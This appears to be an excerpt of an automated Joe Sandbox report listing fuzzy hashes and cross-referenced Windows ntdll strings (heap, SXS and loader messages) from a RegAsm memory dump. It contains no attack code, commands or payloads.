                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                          • API String ID: 0-3127649145
                                                                                                                          • Opcode ID: cb971e2ddd70c30b96f06887c38925fd7fa933b5bd3fc551c37480d9bb0448af
                                                                                                                          • Instruction ID: cbc275151bcff8c53658fdf0c492af43ca184b2d432c280495a9805541828194
                                                                                                                          • Opcode Fuzzy Hash: cb971e2ddd70c30b96f06887c38925fd7fa933b5bd3fc551c37480d9bb0448af
                                                                                                                          • Instruction Fuzzy Hash: 14326D71E013199BDB21DF25CD88BAAB7F9FF48344F1041EAE609A7650DB71AA84CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                          • API String ID: 0-3393094623
                                                                                                                          • Opcode ID: 629bec809db1a630a335431a0b381d6126ac9889101c618e528bdf6959a13813
                                                                                                                          • Instruction ID: 7aca5f0bbcca6d0f796da042dd6d4a14a1f5917ec8aad13dc9a0a4f4c3c05411
                                                                                                                          • Opcode Fuzzy Hash: 629bec809db1a630a335431a0b381d6126ac9889101c618e528bdf6959a13813
                                                                                                                          • Instruction Fuzzy Hash: 3C028B71948341CFD7A0CF64C180BABBBE5BF88748F41991EEAC99B251E770D844CB92
                                                                                                                          Strings
                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 02F05247
                                                                                                                          • WindowsExcludedProcs, xrefs: 02F0522A
                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 02F0542B
                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 02F0527B
                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 02F05352
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                          • API String ID: 0-258546922
                                                                                                                          • Opcode ID: b17758901999ccc45bb0eb56f7ef4d15b7b8d0b54086f8cfbce196caed6a7280
                                                                                                                          • Instruction ID: 3ba184796da3da01b90d4f7b51c83490897aa1e92222383cb60091cdc9e92322
                                                                                                                          • Opcode Fuzzy Hash: b17758901999ccc45bb0eb56f7ef4d15b7b8d0b54086f8cfbce196caed6a7280
                                                                                                                          • Instruction Fuzzy Hash: 4BF14C72D00229EBCB15DF94C990AEEBBB9FF08794F55405AE601B7250DBB49E01DFA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                          • API String ID: 0-2518169356
                                                                                                                          • Opcode ID: 534e2e2abc3a8a65d9dfd3124ce66c364e9e7ff405d4c774c6c66065cb0e6688
                                                                                                                          • Instruction ID: 4ce6e16d050df43937ccb747a9925d6ede49f6055701f885fe28082601a39694
                                                                                                                          • Opcode Fuzzy Hash: 534e2e2abc3a8a65d9dfd3124ce66c364e9e7ff405d4c774c6c66065cb0e6688
                                                                                                                          • Instruction Fuzzy Hash: D491C072E0061ADBCB21CF68C884ABEB7B1EF49790F944169E910F7350D735D941CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-1975516107
                                                                                                                          • Opcode ID: 9f463bf741c1433bc26239f1eb955b3649bc4ad66c0b33c233b27ab883410861
                                                                                                                          • Instruction ID: 188b5202fe8da4da73c929472d66b78e82c5f55a8b78ebd3b1e6bffebd0ed6f8
                                                                                                                          • Opcode Fuzzy Hash: 9f463bf741c1433bc26239f1eb955b3649bc4ad66c0b33c233b27ab883410861
                                                                                                                          • Instruction Fuzzy Hash: B151FF72E442499FDB14DFE4C884B9DBBF2FF04788F248159DA01AB281D770A951DF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                          • API String ID: 0-3061284088
                                                                                                                          • Opcode ID: fffee9d7d6a3b2cd72a3cf9b61c366fe11dd0e0fddccc83e00b68195448df28f
                                                                                                                          • Instruction ID: 1df6ad11164991c6ca6549b9fffb53c9374352ae831d180cc343ef50d7a0512b
                                                                                                                          • Opcode Fuzzy Hash: fffee9d7d6a3b2cd72a3cf9b61c366fe11dd0e0fddccc83e00b68195448df28f
                                                                                                                          • Instruction Fuzzy Hash: 860128335C5290DEF3269328E41AFA3BBE4EF42FB8F15D04DF0154BA50DAB49881C520
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: dc1494fef6df3afa80f799ab640c9431735eda15eb7f5c7f7fc87dcbbd62b5c0
                                                                                                                          • Instruction ID: ef1510109e3e40eb272d2fd64b4f25cba7125a89045969386f1563b7558cf075
                                                                                                                          • Opcode Fuzzy Hash: dc1494fef6df3afa80f799ab640c9431735eda15eb7f5c7f7fc87dcbbd62b5c0
                                                                                                                          • Instruction Fuzzy Hash: FD13BC70A40655CFDB68CF68C8907A9FBF2BF49308F14D1A9DA49AB381D734A945CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3570731704
                                                                                                                          • Opcode ID: a5497c98ea100d63c4761482552a928a8d5dcbddcf9fe566aab14a3d86d9874e
                                                                                                                          • Instruction ID: ce1e4fecac0c5dfbb47f6ddbca09a100113bafff896a747c60aaf818e881f298
                                                                                                                          • Opcode Fuzzy Hash: a5497c98ea100d63c4761482552a928a8d5dcbddcf9fe566aab14a3d86d9874e
                                                                                                                          • Instruction Fuzzy Hash: 8D924971E41268CFEB64DF24C850BA9B7B6BF45354F0581EAEA4DAB240DB709E80CF51
                                                                                                                          Strings
                                                                                                                          • SsHd, xrefs: 02EFA885
                                                                                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02F47D39
                                                                                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02F47D03
                                                                                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02F47D56
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                          • API String ID: 0-2905229100
                                                                                                                          • Opcode ID: 9fb4930df7bb807874a24a1b412e801941015c9eda066970c5127ebc03f7e75c
                                                                                                                          • Instruction ID: 06257acebbd2cd29916141d3f044738dd0a7bf05d6bcdf3e72cacdd7fda78bb4
                                                                                                                          • Opcode Fuzzy Hash: 9fb4930df7bb807874a24a1b412e801941015c9eda066970c5127ebc03f7e75c
                                                                                                                          • Instruction Fuzzy Hash: 30D1AF31E402199BDF24CF98D8C06ADFBB6EF48358F15907AEA09AF341D7719941CBA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: 455992d06fb94db4a2ef2ba546bec56a458b6846cb0c78f8f9d3dab6c4a46413
                                                                                                                          • Instruction ID: 8c45a542839e2d9cec5adebd61a47479f70b460829557e7032828dee0b893832
                                                                                                                          • Opcode Fuzzy Hash: 455992d06fb94db4a2ef2ba546bec56a458b6846cb0c78f8f9d3dab6c4a46413
                                                                                                                          • Instruction Fuzzy Hash: E4E2C170A40255CFDB65CF68C890BAABBF1FF49308F14D199EA49AB385D734A845CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                          • API String ID: 0-379654539
                                                                                                                          • Opcode ID: 4409f84048880e84722fdcba007552ff1f72e1efe7f52e1ad2071f6d1852e4b7
                                                                                                                          • Instruction ID: c2e1934ee421cd6f5d0164e6ddd4f4413386ed3c9b07e360c9912b4e902ce6b2
                                                                                                                          • Opcode Fuzzy Hash: 4409f84048880e84722fdcba007552ff1f72e1efe7f52e1ad2071f6d1852e4b7
                                                                                                                          • Instruction Fuzzy Hash: 24C177755483828FCB21DF58C444BAAB7E4BF84748F00997EFA968B350E774CA49CB52
                                                                                                                          Strings
                                                                                                                          • HEAP: , xrefs: 02F454E0, 02F455A1
                                                                                                                          • HEAP[%wZ]: , xrefs: 02F454D1, 02F45592
                                                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02F454ED
                                                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02F455AE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                          • API String ID: 0-1657114761
                                                                                                                          • Opcode ID: 1ed25ab6f3e72a5e66d25f649e9e9b3bbcfd4910b7d428b4d757504d963a9338
                                                                                                                          • Instruction ID: d458a21229b2d23cdd2c7f1bfb9beb71f520f3f50cab4571b62f7f8525f4a69d
                                                                                                                          • Opcode Fuzzy Hash: 1ed25ab6f3e72a5e66d25f649e9e9b3bbcfd4910b7d428b4d757504d963a9338
                                                                                                                          • Instruction Fuzzy Hash: 86A11431A806459FDB64DF24C840BBABBF2BF05308F14D56DE68A8B34AD771E845CB51
                                                                                                                          Strings
                                                                                                                          • .Local, xrefs: 02F128D8
                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02F522B6
                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02F521D9, 02F522B1
                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 02F521DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                          • API String ID: 0-1239276146
                                                                                                                          • Opcode ID: 259d6026e20016002b999f6d274c19de277a204d2920eb68865a334355ed2cd1
                                                                                                                          • Instruction ID: 9f67f49ea375fddc947178d8d0f3c4962384e769467d8a0265d28fe505004050
                                                                                                                          • Opcode Fuzzy Hash: 259d6026e20016002b999f6d274c19de277a204d2920eb68865a334355ed2cd1
                                                                                                                          • Instruction Fuzzy Hash: 35A1AE35E402299BDB24CFA8CC94BA9B3B1BF58354F5541EADE08AB254D7309E81CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                          • API String ID: 0-2586055223
                                                                                                                          • Opcode ID: 8a7fd60d5b3fa9c2086058ebfc88adbd062bdfc0f17fe20a37ce40bd41a7887f
                                                                                                                          • Instruction ID: 8a1c9fa9a05cfc0cff2b21744a38656d1cef8e52848bf53e0ed7e8fc025e1403
                                                                                                                          • Opcode Fuzzy Hash: 8a7fd60d5b3fa9c2086058ebfc88adbd062bdfc0f17fe20a37ce40bd41a7887f
                                                                                                                          • Instruction Fuzzy Hash: 73611536284780AFE722DB28CD44FA777E9EF847A4F048468FA568B691D734D901CB61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                          • API String ID: 0-336120773
                                                                                                                          • Opcode ID: 2eb6bd636a86973dc1e20d05cc7b320de6ccd2b40d83c938dc4da2987afc4a45
                                                                                                                          • Instruction ID: 744a67a3c308d07a7fd4c55e68302b81529fd1b0da7b0a26afa0c3c7d82a3551
                                                                                                                          • Opcode Fuzzy Hash: 2eb6bd636a86973dc1e20d05cc7b320de6ccd2b40d83c938dc4da2987afc4a45
                                                                                                                          • Instruction Fuzzy Hash: D031F831640151EFFB12EB98C885FA773E9EF057A4F154069F609DB250E7709D40CE54
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                          • API String ID: 0-1391187441
                                                                                                                          • Opcode ID: 9f302308616c8c2ac81cb5f147fc71c6bb68582cd7521b5c16099c0ff8b5a7c6
                                                                                                                          • Instruction ID: c3c335771565f23fe4e7401059a7129c558ff7b8fcb272d01e61798735d70b19
                                                                                                                          • Opcode Fuzzy Hash: 9f302308616c8c2ac81cb5f147fc71c6bb68582cd7521b5c16099c0ff8b5a7c6
                                                                                                                          • Instruction Fuzzy Hash: 0B313432A80154EFDB02DB44CC84FAAB7B9EF44768F168059F915A7291D770EC41CA20
                                                                                                                          Strings
                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02EF327D
                                                                                                                          • HEAP: , xrefs: 02EF3264
                                                                                                                          • HEAP[%wZ]: , xrefs: 02EF3255
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                          • API String ID: 0-617086771
                                                                                                                          • Opcode ID: 7293bf9e27e5cf9743ab13baf93e5af9bcde86dc98024582864d10c0701a1660
                                                                                                                          • Instruction ID: 480300b41b00dc630dde273fdd15e48ab1b6a569ea75dcadeaf14e15fb35454d
                                                                                                                          • Opcode Fuzzy Hash: 7293bf9e27e5cf9743ab13baf93e5af9bcde86dc98024582864d10c0701a1660
                                                                                                                          • Instruction Fuzzy Hash: 7D92CD71A442889FDB65CF68C8407AEBBF1FF48308F14D099EA5AAB391D735A941CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: 7406ff8fe0862cd51401a1d7068edcb53043f5902888156e94cf57bb78443741
                                                                                                                          • Instruction ID: e1f6b2faccb9addc4011085c5559bbf949bfc9ab6dd4c51e9eed8ebf726afa9b
                                                                                                                          • Opcode Fuzzy Hash: 7406ff8fe0862cd51401a1d7068edcb53043f5902888156e94cf57bb78443741
                                                                                                                          • Instruction Fuzzy Hash: 4E221370A402459FEB15DF28C490B7ABBF6FF05748F18C459EA46CB686DBB1E881CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: 8b428ca7c219149edcbce53de18f6f90c51d2ba9e37e57077123d2ab9d100a2b
                                                                                                                          • Instruction ID: 20f04e359dd209a97b9fa493955dcb67e862a29d844b9b9fc382c3296e643771
                                                                                                                          • Opcode Fuzzy Hash: 8b428ca7c219149edcbce53de18f6f90c51d2ba9e37e57077123d2ab9d100a2b
                                                                                                                          • Instruction Fuzzy Hash: 5CF1C070B40605DFEB15DF68C890B6AB7B6FF84344F148199EA069B396D770E941CF50
                                                                                                                          Strings
                                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02EE1728
                                                                                                                          • HEAP: , xrefs: 02EE1596
                                                                                                                          • HEAP[%wZ]: , xrefs: 02EE1712
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: 924c84ed13019f260f80a38f79f3f572db3e442bc6e95d3655867012efdca423
                                                                                                                          • Instruction ID: 5961821885df28574b62f9c0e6bfdaac6d5adf0e3c07c680813b81ee88876a47
                                                                                                                          • Opcode Fuzzy Hash: 924c84ed13019f260f80a38f79f3f572db3e442bc6e95d3655867012efdca423
                                                                                                                          • Instruction Fuzzy Hash: 80E10F70A442469BCB29CF28C451BBABBF2AF48308F14D55DE99BCB245E734E880CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                          • API String ID: 0-1145731471
                                                                                                                          • Opcode ID: 92dda640379890264104f73d988e8fc6cc3a3c42849301d155d839227c16b832
                                                                                                                          • Instruction ID: de6b824ed575593f8d0a3de6f2eac904a3576c6d948b793cbff3fe83a2826773
                                                                                                                          • Opcode Fuzzy Hash: 92dda640379890264104f73d988e8fc6cc3a3c42849301d155d839227c16b832
                                                                                                                          • Instruction Fuzzy Hash: 9DB19C32E456448BDB25DF69C980FADBBB6BF44348F24856DE952EB790DB70E840CB40
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                          • API String ID: 0-2391371766
                                                                                                                          • Opcode ID: f675df177f44e33fa9ef4bbf21690edc1934c58a6d775320744e879ead7d95e2
                                                                                                                          • Instruction ID: f2faa9044abff4c269dee2ff944196b49e00161b5240fa17a155bf1264f30d7f
                                                                                                                          • Opcode Fuzzy Hash: f675df177f44e33fa9ef4bbf21690edc1934c58a6d775320744e879ead7d95e2
                                                                                                                          • Instruction Fuzzy Hash: C9B1AB72A45345AFE311DE64C888F6BB7E9EB45B94F004969FB41EB280D771E804CF92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $@
                                                                                                                          • API String ID: 0-1077428164
                                                                                                                          • Opcode ID: 0f88fa6be43eb7feb7744993a0b0388c998bc0f027d6e0287c221fc0d99a1f09
                                                                                                                          • Instruction ID: f505057c0a4f8315bb888c7d02a400c5531d154472714cdfec796b9e8d738b1a
                                                                                                                          • Opcode Fuzzy Hash: 0f88fa6be43eb7feb7744993a0b0388c998bc0f027d6e0287c221fc0d99a1f09
                                                                                                                          • Instruction Fuzzy Hash: 8AC29471A093419FD725CF24C880BABFBE5AF88784F04896DFA89C7281D774E845DB52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                          • API String ID: 0-2779062949
                                                                                                                          • Opcode ID: 36177e442d9c3929dc1794cca35a6bef65f68d3675ca6aa1dd3d6fb5c8715e77
                                                                                                                          • Instruction ID: fad034fba975e3282c4cb1793e697761b79755251da8ba225974e0833679aed4
                                                                                                                          • Opcode Fuzzy Hash: 36177e442d9c3929dc1794cca35a6bef65f68d3675ca6aa1dd3d6fb5c8715e77
                                                                                                                          • Instruction Fuzzy Hash: BDA19A71D012299BDB31DF24CC88BEAB7B9EF04754F1041EAEA09A7250D7359E85CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                          • API String ID: 0-318774311
                                                                                                                          • Opcode ID: 4c111dcd4ccfb59f630589184568c8df193e27f4d36b00d1038d89c64dd576a4
                                                                                                                          • Instruction ID: 7be9e55094547993b3266311eb85933d4cb75a8d0b13b63560b050ec14e79674
                                                                                                                          • Opcode Fuzzy Hash: 4c111dcd4ccfb59f630589184568c8df193e27f4d36b00d1038d89c64dd576a4
                                                                                                                          • Instruction Fuzzy Hash: CA81AB72A08345AFD321DB14C884F6AB7E9EF85794F0449AEFE909B390D734D904DB62
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %$&$@
                                                                                                                          • API String ID: 0-1537733988
                                                                                                                          • Opcode ID: f6b70e0ad2a7692575630b4469b31d21c697fdb804ed15993df8f95521066463
                                                                                                                          • Instruction ID: b905d92e5846a8e770e113342bbb1ddebc6dbc3e678ae49f3d217bcc260d54d7
                                                                                                                          • Opcode Fuzzy Hash: f6b70e0ad2a7692575630b4469b31d21c697fdb804ed15993df8f95521066463
